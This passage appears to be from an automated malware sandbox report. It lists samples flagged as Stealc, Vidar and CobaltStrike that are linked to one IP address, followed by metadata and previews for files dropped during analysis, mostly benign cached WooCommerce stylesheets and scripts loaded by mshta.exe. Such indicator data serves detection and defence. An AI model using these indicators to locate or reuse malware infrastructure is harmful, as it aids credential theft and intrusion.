                                                                                                                                                                                                      TP77MvSzt2.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      1GeaC4QnFy.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      OyPpyRRqd8.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                      • 185.68.16.189

                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                      Entropy (8bit):0.8307396869526211
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugo:gJjJGtpTq2yv1AuNZRY3diu8iBVqFq
                                                                                                                                                                                                      MD5:EC239538AC1209179BCD028DE4204DF4
                                                                                                                                                                                                      SHA1:22203F4E3494E795EE20703751B7C25E8E07F46D
                                                                                                                                                                                                      SHA-256:2E3663BAF5E8A206582AF150A8BC0CED3B15E7364C3ABBCC4D181210D75D0D48
                                                                                                                                                                                                      SHA-512:62392139B2A3CCE5B37D0873C372F2EECAD1E193C03CBFE86453F45D1D9418BF15C13505973486FE283A097102D281B9014BE6159193E9BC7F89CFC2F5F88433
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0aa80d8e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                      Entropy (8bit):0.6586353049356426
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:JSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Jaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                      MD5:B3ABBFC761F74F9F4307BD25F987FF1B
                                                                                                                                                                                                      SHA1:D57759B03DB3218BD648345D01B343FD20E9E140
                                                                                                                                                                                                      SHA-256:A26836CC1FFF35411381EF18DB4199FAA2B3AB5C951BBDF1387BD84A4772A3A4
                                                                                                                                                                                                      SHA-512:46920F30C20ECD789081F07CEDCD439EA21A549785F21D1281F6988AF73592AEDAE09FF40A14B59337F39A07826450C79F3E1C6A3E53DCC829B276F0EF0C27A0
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Preview:....... ...............X\...;...{......................0.z..........{...#...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................3.#...|.....................#...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                      Entropy (8bit):0.08099429692356074
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:x8YeEH8PhVGuAJkhvekl13szhGtillrekGltll/SPj:GzpPbrxlezcQJe3l
                                                                                                                                                                                                      MD5:AB8D5DE9E8492EF38ACE395370B04E5C
                                                                                                                                                                                                      SHA1:CA01ED667C807F342BA85283CDB1B15E95A2A33A
                                                                                                                                                                                                      SHA-256:52DAEE3BE405B6E91730746F1CE293F059BF1FC17ADEA328E6586651D1B6D3E2
                                                                                                                                                                                                      SHA-512:C4006150AB3BFC5B5FFF70B5BDE07C66D215819742EFDF2E411438CE524E2D0464A174C08C1C99CFA3F72F9BC612491CDBEF94FF1F99090081E485130DAB4F99
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Preview:#_.......................................;...{...#...|.......{...............{.......{...XL......{......................#...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):49120
                                                                                                                                                                                                      Entropy (8bit):0.0017331682157558962
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Ztt:T
                                                                                                                                                                                                      MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                                                      SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                                                      SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                                                      SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\awdr-dynamic-price[1].js

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3053
                                                                                                                                                                                                      Entropy (8bit):3.887265636358029
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:P/M8xKhcYZkrMgtpRkMMtMbpbM3PMVsnYtE8rY8Wysl+y2:P/jxKhcYSr1pRIUpbSP3YtzrY8WyVy2
                                                                                                                                                                                                      MD5:0624A076A8B15D2D238FB31043BED59C
                                                                                                                                                                                                      SHA1:A1F9ADBCB37555B3ADB1F59666CE22DB51658382
                                                                                                                                                                                                      SHA-256:CB8528F82C58653AB48A3C62C296C0E5B8483AB9D53A435D1372D401FD2A63D0
                                                                                                                                                                                                      SHA-512:CB7FA810802EBD7BF47EAA3CFC464F9793AAFE3767C662D2C211C9A12ED99F078090919D88F2BC0B17F56B237390D176A2621D408FBA2893C246AF2BECA12EB2
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                      Preview:(function ($) {. $.extend({. AdvanceWooDiscountRules: {. form: null,. product_id: null,. quantity: 0,. options: [],. target: null,. getDynamicDiscountPriceFromCartForm: function($form, $target, $options){. if (typeof $options !== 'undefined') {. this.options = $options;. }. if (typeof $target !== 'undefined') {. this.target = $target;. }. if (typeof $form !== 'undefined' && $form.is('form')) {. this.form = $form;. } else {. this.logError("Incorrect form provided");. }. this.product_id = this.getProductIdFromForm();.. this.quantity = this.getProductQuantityFromForm();. this.getDiscountPriceForProduct();. },. getDiscountPriceForProduct: function () {. if(

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\checkbox[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9449
                                                                                                                                                                                                      Entropy (8bit):4.756757398987589
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:dw+uqpCu0bwKgNMtdWa+cXSXY3JaYaXsl92hHfxwWTKfnL8:dw9MhKfnA
                                                                                                                                                                                                      MD5:188CCDBEEA4D10DD60439F916DE74065
                                                                                                                                                                                                      SHA1:DC35E3DD016EB92E17066B01CA62C0F9007EC08C
                                                                                                                                                                                                      SHA-256:051E54F3529E73A270DF3EEC7B5141A20241AEF20E1146A564E635E5B99CA1C6
                                                                                                                                                                                                      SHA-512:F2B8FB893B4B0E441D067F38DFEB8D9E42C1DDC5C002AB86E5F8373890F91DE78483816654E6639CB8B5409EFFB54864413BDEC879FD2164F31B84B6E3EFF559
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview::root {. --woof-sd-ie-ch_width: 25px;. --woof-sd-ie-ch_height: 25px;.. --woof-sd-ie-ch_space: 1px;. --woof-sd-ie-ch_space_color: #ffffff;.. --woof-sd-ie-ch_text_top: 0;. --woof-sd-ie-ch_text_color: #6d6d6d;. --woof-sd-ie-ch_hover_text_color: #333333;. --woof-sd-ie-ch_selected_text_color: #000000;. --woof-sd-ie-ch_font_size: 15px;. --woof-sd-ie-ch_font_family: inherit;. --woof-sd-ie-ch_font_weight: 400;. --woof-sd-ie-ch_hover_font_weight: 400;. --woof-sd-ie-ch_selected_font_weight: 400;. --woof-sd-ie-ch_line_height: 18px;. --woof-sd-ie-ch_side_padding: 0;... --woof-sd-ie-ch_color: #ffffff;. --woof-sd-ie-ch_hover_color: #79b8ff;. --woof-sd-ie-ch_selected_color: #79b8ff;. --woof-sd-ie-ch_image: url();. --woof-sd-ie-ch_selected_image: url();. --woof-sd-ie-ch_hover_image: url();. --woof-sd-ie-ch_hover_scale: 100;. --woof-sd-ie-ch_selected_scale: 100;.. --woof-sd-ie-ch_border_radius: 0;. --woof-sd-ie-ch_border_width:

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\chosen.min[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (372)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9765
                                                                                                                                                                                                      Entropy (8bit):4.814774684621602
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:O/OjL3rn7jkJjYQw2HXlcIQCK0HTpNvYY6oRWYmi90Q:HN42YLR
                                                                                                                                                                                                      MD5:72E9B866AC4B28674A41F8535A512CCA
                                                                                                                                                                                                      SHA1:33CF8115AA16B4F6AA2C28494DBD5126839E80C0
                                                                                                                                                                                                      SHA-256:EA2B40344A11F515E346ED0622BFF12600F3CF80C35D02C538C9CE72E1E5F9EB
                                                                                                                                                                                                      SHA-512:EA5C3FD755F6A0E8B8F293847ADECFDE25876E97D76209235C097110309DB7F53253AD090D5EC5134EC96498CD60559F6D4CA497CE54191399B346FFC8F217CF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:/*!.Chosen, a Select Box Enhancer for jQuery and Prototype.by Patrick Filler for Harvest, http://getharvest.com..Version custom.Full source at https://github.com/harvesthq/chosen.Copyright (c) Harvest http://getharvest.com..MIT License, https://github.com/harvesthq/chosen/blob/master/LICENSE.md.This file is generated by `grunt build`, do not edit it by hand..*/.chosen-container{. position:relative;. display:inline-block;. vertical-align:middle;. font-size:13px;. user-select:none.}..chosen-container *{. box-sizing:border-box.}..chosen-container .chosen-drop{. position:absolute;. top:100%;. z-index:1010;. width:100%;. border:1px solid #aaa;. border-top:0;. background:#fff;. clip:rect(0,0,0,0);. clip-path:inset(100% 100%).}..chosen-container.chosen-with-drop .chosen-drop{. clip:auto;. clip-path:none.}..chosen-container a{. cursor:pointer.}..chosen-container .chosen-single .group-name,.chosen-container .search-choice .group-name{. ma

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\flatsome-shop[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (24156)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):24163
                                                                                                                                                                                                      Entropy (8bit):5.0119260774128085
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:384:/iJ3tWod9MljxJRny8wZyAgaeAsKDVESv4C12fYujmRFOS1tkV0QSYCnF7OX5:/iJ3t569n1EgaLVh12fYujmRFOutkV0M
                                                                                                                                                                                                      MD5:77A3EFD7056D250655573B14A61D111E
                                                                                                                                                                                                      SHA1:22A4C65BCF6728A849339061E74C4C07D7D136D6
                                                                                                                                                                                                      SHA-256:2CAB994EE334C133AC8504B5D0E79F7870DA50590C57DEA956FA76AEBF1562E8
                                                                                                                                                                                                      SHA-512:850DC8830CF08AA7A87AA52D8BA1C9B2EE9AA8370A662C131F17A740D18F839AE3E610A05BFB9C01BA6748C7E1FC5A519C276339F11F4BFF72669B755E069592
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:@charset "utf-8";.widget_shopping_cart_content .blockUI.blockOverlay,.woocommerce-checkout-review-order .blockUI.blockOverlay{background-color:#fff!important;opacity:.6!important}.widget_shopping_cart_content .blockUI.blockOverlay:before,.woocommerce-checkout-review-order .blockUI.blockOverlay:before{animation:spin .6s linear infinite;border-bottom:3px solid rgba(0,0,0,.1)!important;border-left:3px solid #446084;border-radius:50%;border-right:3px solid rgba(0,0,0,.1)!important;border-top:3px solid rgba(0,0,0,.1)!important;content:"";display:block;font-size:2em;height:30px;left:50%;line-height:1;margin-left:-.5em;margin-top:-.5em;pointer-events:none;position:absolute;text-align:center;top:50%;width:30px}.category-page-row{padding-top:30px}.price_slider_amount input{display:none}.woocommerce-result-count{display:inline-block;margin:0 1em 0 auto}.woocommerce-ordering,.woocommerce-ordering select{display:inline-block;margin:5px 0}.add_to_cart_button.added{display:none}a.added_to_cart{displ

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\flatsome[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):145954
                                                                                                                                                                                                      Entropy (8bit):5.104897906338081
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:Xq5/32FTXYK8Jm1LqCYDC8eliJN+w0dOeLWo0EADT+1zecyrNVuD:Z8eliJN+w0dOeLWo0EADT+1zecyrNVuD
                                                                                                                                                                                                      MD5:56676AF37B8E946B1BF7587864A50D1B
                                                                                                                                                                                                      SHA1:4E1C02E58A10B2AF1F2AD829E2FFEE454957BB92
                                                                                                                                                                                                      SHA-256:8F8D0DF7656637D7D5DFF514745B1BC890013A71B6AB6AEFBE97E6FA1DA14984
                                                                                                                                                                                                      SHA-512:D0F331ABA8A54F97B4A04E07AAF9EB19C8CE100FAC7029493547538251D44433FD39AFC5B48F3FB483F75B9B627239A3C931005B9A312840FD904EA02AD45CCF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:@charset "utf-8";html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;font-family:sans-serif}body{margin:0}article,aside,details,figcaption,figure,footer,header,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block}audio:not([controls]){display:none;height:0}progress{vertical-align:baseline}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline-width:0}abbr[title]{border-bottom:none;text-decoration:none}b,strong{font-weight:inherit;font-weight:bolder}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{display:inline-block;font-size:80%}img{border-style:none}svg:not(:root){overflow:hidden}button,input,select,textarea{font:inherit}optgroup{font-weight:700}button,input,select{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{cursor:pointer}[disabled]{cursor:default}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}button

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\label[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1256
                                                                                                                                                                                                      Entropy (8bit):4.699585940208305
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:h5lqUBSydDF8yF9OyeDVjtokvMuTuSSi791GZs+Scirpvw7RSevMuW:h5ly6vOrDVh96SR7GXVRR9W
                                                                                                                                                                                                      MD5:9F98A7262163D20AEDC73AFBAC70DCEA
                                                                                                                                                                                                      SHA1:D8B963AB148CDA48ABB4D2D379BD72737C40E089
                                                                                                                                                                                                      SHA-256:093B42292C864BA77AA5523A73EC87D2690D387FFE7F721BD679860C45902727
                                                                                                                                                                                                      SHA-512:5386927FBCFAB47F049FEFCA6F278EA50503A79F79AAF1BC563C1C9F25B9ABA0AD10BDDAF598ACA1F831E9FE5EB358489F927DE20C1300F28A72A7F5B87BD49B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked {. background-color: #34495e;. border-color: #34495e;.}....woof_list_label li {. display: inline-block !important;. margin: 2px;. vertical-align: top;.}...woof_list_label .woof_label_term.{. background-color: #efefef;. border: 1px solid #ddd;. margin: 3px 3px 3px 0;. padding: 3px 4px;. . line-height: 25px;. text-align: center;. overflow: hidden;. text-decoration: none;. cursor: pointer;.. min-width: 50px;. max-width: 100%;. height: 50px;. display: flex;. justify-content: center;. align-items: center;.}...woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked.{. background-color: #477bff;. border-color: #477bff;. color: #fff;.}...woof_label_count{. font-size: 10px;. position: absolute;. border-radius: 200px;. min-width: 17px;. height: 17px;. line-height: 17px !important;. color

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\tooltip[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):735
                                                                                                                                                                                                      Entropy (8bit):4.591792549870781
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:DYmbPHW888SFXr+M+CNOlgwYti7jf0mPwQrfqY2gFKey15ktEKVEn:DYmbPjSFbxNK7FPT4gFKeycuKVE
                                                                                                                                                                                                      MD5:BE1767D1176577B3242B17F4C8D81B02
                                                                                                                                                                                                      SHA1:F9C426E610CA3C4D51E15AE5A5D339EE3242EA5F
                                                                                                                                                                                                      SHA-256:A85627770160E545326D46B1E2FD9FA91B1B8AEE846E3982820E99F5178106C4
                                                                                                                                                                                                      SHA-512:F7CF666EF6A051E01DEDFBF31C21DEAC2725CF732A3EA8208269E0494D32EE177741EDD259CED05EC13EFC417B0802779D08B93B0E60A097986C0B536B1F5BC4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof-sd-tooltip {. position: relative;.}...woof-sd-tooltip .woof-sd-tooltiptext {. visibility: hidden;. min-width: 120px;. background-color: black;. color: #fff;. text-align: center;. border-radius: 6px;. padding: 5px 0;. position: absolute;. z-index: 999;. top: calc(100% + 6px);. left: 50%;. margin-left: -60px;. box-sizing: border-box;. display: block;.}...woof-sd-tooltip .woof-sd-tooltiptext::after {. content: "";. position: absolute;. bottom: 100%;. left: 50%;. margin-left: -5px;. border-width: 5px;. border-style: solid;. border-color: transparent transparent black transparent;.}...woof-sd-tooltip:hover .woof-sd-tooltiptext {. visibility: visible;.}..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\awdr_style[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1143
                                                                                                                                                                                                      Entropy (8bit):4.841850403394578
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:0bcBq95/SyHaTc88bc2ZgH8avmeqDRzxY/JrKThGT2epFMADSTQFHp:xBs5/mTco26HzeDBxYDTH1DJHp
                                                                                                                                                                                                      MD5:B0AF44348A08900199107155048211B9
                                                                                                                                                                                                      SHA1:97D63FBF5EE0CBE68CD7C8B2D0238DC1456806C1
                                                                                                                                                                                                      SHA-256:86298A871666C6F4E59411B98F48F91043AEB724A584F92EF4248DA454955B43
                                                                                                                                                                                                      SHA-512:9941B58EC810AB8C3FE70BB0789D6E516777660EDE1DB5F97C3599AEF057E8654A5EEC42617C910E95F6D414427B99145A7DDF8B45C2B09B49AE0605D977C290
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.awdr_free_product_text{. display: inline-block;. padding: 0px 10px;. background-color: #3d9cd2;. color: #fff;. border-radius: 3px;.}..variation-wdr_free_product{. display: none !important;.}..awdr_change_product{. cursor: pointer;.}..awdr_free_product_variants{. padding: 5px;.}..awdr-product-name{. padding-left: 10px;.}..awdr_change_product{. display: flex;.}..awdr-select-free-variant-product-toggle {. color: gray;. cursor: pointer;. width: 100%;. border: none;. text-align: left;. outline: none;. font-size: 1.02em;. transition: 0.4s;.}...awdr-select-free-variant-product-toggle-active, .awdr-select-free-variant-product-toggle:hover {. color: #444;.}...awdr-select-variant-product {. padding: 0 18px;. display: none;. background-color: white;. overflow: hidden;.}..awdr-select-free-variant-product-toggle:after {. content: '\02795'; /* Unicode character for "plus" sign (+) */. font-size: 12px;. color: #777;. ma

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\color[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):5745
                                                                                                                                                                                                      Entropy (8bit):4.684887323091434
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:3qA9usR1aMd5CUN4+04j30VfaXt2Y5HJGRUU5:asusR1aMdzN4D4jEVfaXth5wRUU5
                                                                                                                                                                                                      MD5:42D8E48001FDAA4FEC9FC10645CC211E
                                                                                                                                                                                                      SHA1:4E776DA85C2361E333E24A642A96B9766A670B83
                                                                                                                                                                                                      SHA-256:F56B11F2C3245EB95100FA1B5A7E8102F6D760353962624F0896C77C66423284
                                                                                                                                                                                                      SHA-512:C3415FEE85D2D314EC12ADC3F2ABE6B2411E9FAE06D58C11F06E96DF294B9A959D8DECD575A1B974A708488C5F76AB88E078E5F00795E4F993B10580576D4E1D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview::root {. --woof-sd-ie-clr_width: 60px;. --woof-sd-ie-clr_height: 60px;.. --woof-sd-ie-clr_show_tooltip: none;. --woof-sd-ie-clr_show_tooltip_count: block-inline;... --woof-sd-ie-clr_color: #000000;. --woof-sd-ie-clr_image: url();. --woof-sd-ie-clr_hover_scale: 110;. --woof-sd-ie-clr_selected_scale: 110;.. --woof-sd-ie-clr_border_radius: 50%;. --woof-sd-ie-clr_border_width: 1px;. --woof-sd-ie-clr_hover_border_width: 1px;. --woof-sd-ie-clr_selected_border_width: 1px;. --woof-sd-ie-clr_border_color: #79b8ff;. --woof-sd-ie-clr_hover_border_color: #79b8ff;. --woof-sd-ie-clr_selected_border_color: #79b8ff;. --woof-sd-ie-clr_border_style: solid;. --woof-sd-ie-clr_hover_border_style: dashed;. --woof-sd-ie-clr_selected_border_style: dashed;.. --woof-sd-ie-clr_margin_right: 9px;. --woof-sd-ie-clr_margin_bottom: 11px;.. --woof-sd-ie-clr_transition: 300s;... --woof-sd-ie-clr_counter_show: inline-flex;. --woof-sd-ie-clr_counter_wi

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\customize-table[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                                                      Entropy (8bit):4.478408999166407
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:ngCLczw62mCFAsRpfFPKNY+xevYn:PLckGGAwDy++xevYn
                                                                                                                                                                                                      MD5:B33E17B48C6E4127F08FF901EDC1A3A0
                                                                                                                                                                                                      SHA1:50041C79EC0C509CB8E2A0F207FC5955F86C4F1C
                                                                                                                                                                                                      SHA-256:6B7C982887D1C9CD6B5CAC280423EE79929023FA26E8EB440EF99CFF7411813E
                                                                                                                                                                                                      SHA-512:CFEA6F2422FC556133BE1038ECEC88B61129FCBC978CDE4DF79377D1C0AA320768E6C4B25564547A494B48AB1C100CB8DA9830A733804A2A663853133B969CED
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.awdr_discount_bar{. padding: 10px;. margin-bottom: 10px;. border-radius: 4px;.}

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\front[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):27359
                                                                                                                                                                                                      Entropy (8bit):4.926530646016363
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:AF6uFPnk1i5loDPZbMPs+FeF7F3F0KX07FX:AIuFLfEFx47t
                                                                                                                                                                                                      MD5:4FE4B3F32BBB6FFA24CCDBCE2BEF4846
                                                                                                                                                                                                      SHA1:B46DF4CB68190E0DD021FBE8DD2345848243EB76
                                                                                                                                                                                                      SHA-256:D68EBF618DE4CF4A07601E6BB19B82DE52AC59598C88C26AFF7FCD74BB2ECDB0
                                                                                                                                                                                                      SHA-512:F9362B00D33F530F3971AC952FC7E0B509CF8102F5B1231DD4BEE2170579C9B1D2562DC044E4EEBA80DB952AE6DEE059D600651EEF64C67CD67B422638924D3B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_container{. padding-bottom: 5px;. margin-bottom: 9px;.}...woof_container select{. width: 100%;.}...woof_container label{. display: inline-block !important;.}..ul.woof_list{. margin: 0 !important;. list-style: none !important;.}..li.woof_list{. list-style: none !important;.}...woof_list li{. list-style: none !important;.}...woof_block_html_items ul{. margin-left: 0 !important;.}...woof_list label{. vertical-align: middle;. padding-top: 4px;. padding-bottom: 4px;. display: inline-block !important;.}...woof_childs_list{. padding: 0 0 0 17px !important;. margin: 0 !important;.}../**********************/..woof_auto_show{. position: absolute;. z-index: 1001;. width: 100%;.}...woof_sid_auto_shortcode .woof_container{. width: 33%;. min-width: 150px;.}...woof_sid_auto_shortcode .woof_container,..woof_sid_auto_shortcode .woof_container_mselect{. overflow-x: hidden;. overflow-y: auto;. min-height: fit-content;. max-heig

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\front[2].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4975
                                                                                                                                                                                                      Entropy (8bit):4.852371334557799
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:FGKmF6FOdO3zbTrwFCrGTvWtbLwJsKZwJsK5VhFAESw3iF+RFXUCJ383C:FG3F6FOdODbTkF6G7WtbLwJsKZwJsKft
                                                                                                                                                                                                      MD5:D76A67545EBE417C0692BF1EC0FE29D9
                                                                                                                                                                                                      SHA1:D332488FA37ECF177C5FAA12398E74A9137B55C8
